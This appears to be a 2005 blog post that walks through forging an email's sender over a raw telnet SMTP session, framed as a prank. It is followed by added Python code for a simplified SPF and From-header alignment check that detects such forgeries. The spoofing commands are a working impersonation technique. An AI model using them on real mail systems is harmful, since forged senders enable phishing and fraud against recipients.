Sunday, November 27, 2005

Email Spoofing

Lemme give you a simple example of an email spoof -

1. Open up telnet. Here's how I did that on my Windows 98 SE based machine.
Start > Run > Command
And on command prompt,
telnet
This opened up the Telnet interface.
Click on Connect > Remote System
Type in Hostname as
mail.xyz.com //the mail server name of the target of the spoof.
Port name as 25
Leave the Terminal type as the default vt100

2. The SMTP daemon listening on port 25 of the mail server will respond as
220... ESMTP
indicating that it is using the ESMTP protocol and is ready to establish a mail connection.
You then need to type in
HELO mail.abc.com //the domain name of mail server you want the mail to appear to come from
or
EHLO mail.abc.com
(NOTE - You won't be able to see the commands YOU are typing in the Telnet window. The only lines you will see in the terminal window will be the replies.)
The reply would be
250 OK
If the server is using the ESMTP protocol and you give an EHLO command, you will also get a list of some commands supported by the server.
Now type in
MAIL FROM:john@abc.com //the email address the mail would seem to come from
Reply -
250 OK
and then
RCPT TO:mary@xyz.com //the recipient of the spoofed email
Reply -
250 OK
Then
DATA
Reply -
354 Go ahead
Feed in
FROM: JOHN
TO: MARY
SUBJECT: You are the victim of a prank

Hi, you have been subjected to a prank
.
Reply -
250 OK
Enter
RSET
Reply -
250 OK
Enter
Quit

Reply -
221 Bye

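If Mary now checks her mailbox - mary@xyz.com, she will find a mail from John (john@abc.com) with the subject line 'You are the victim of a prank' EVEN though John never sent that email. SMTP itself does not verify the address given in MAIL FROM or in the FROM: header, so the server accepts both as typed. This is how spammers and virus propagators work...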

You can read more about this spoof and the different SMTP commands at -
http://helpdesk.islandnet.com/pep/smtp.php
AND
http://www.networksorcery.com/enp/protocol/smtp.htm
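
The session above succeeds because the receiving server answers 250 OK to any MAIL FROM. As an added example (not part of the original post), here is the kind of check a receiving server can run before accepting: a simplified SPF evaluation of the connecting IP against the MAIL FROM domain, plus a strict comparison of the FROM: header domain with the envelope domain. The SPF record, the IP addresses, the sample message and the function names are constructed for illustration, only the ip4/ip6/all mechanisms are handled, and DKIM is left out.

```python
import ipaddress
from email import message_from_string
from email.utils import parseaddr

# Constructed SPF record; a real receiver fetches it from the domain's DNS TXT.
# Addresses are from the reserved documentation ranges.
SPF_RECORDS = {"abc.com": "v=spf1 ip4:192.0.2.0/28 ip4:198.51.100.25 -all"}
QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

# Constructed message, as it would arrive in the DATA phase.
SAMPLE = ("From: JOHN <john@abc.com>\nTo: MARY <mary@xyz.com>\n"
          "Subject: You are the victim of a prank\n\n"
          "Hi, you have been subjected to a prank\n")


def domain_of(address):
    return address.rpartition("@")[2].lower()


def spf_check(client_ip, mail_from):
    """Evaluate the ip4/ip6/all subset of SPF for the MAIL FROM domain."""
    record = SPF_RECORDS.get(domain_of(mail_from), "")
    if not record.startswith("v=spf1"):
        return "none"                       # domain publishes no policy
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"                     # default qualifier is pass
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, value = term.partition(":")
        if name == "all":
            return QUALIFIERS[qualifier]
        if name in ("ip4", "ip6"):
            net = ipaddress.ip_network(value, strict=False)
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qualifier]
    return "neutral"                        # no mechanism matched


def verdict(client_ip, mail_from, raw_message):
    """Accept only if SPF passes and header From matches the envelope domain."""
    header_from = parseaddr(message_from_string(raw_message).get("From", ""))[1]
    aligned = domain_of(header_from) == domain_of(mail_from)
    spf = spf_check(client_ip, mail_from)
    return ("accept" if spf == "pass" and aligned else "reject"), spf, aligned
```

The header comparison matters because SPF only covers the envelope address: a message whose MAIL FROM domain passes SPF can still carry an unrelated FROM: header, which is what the mail client shows to Mary.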
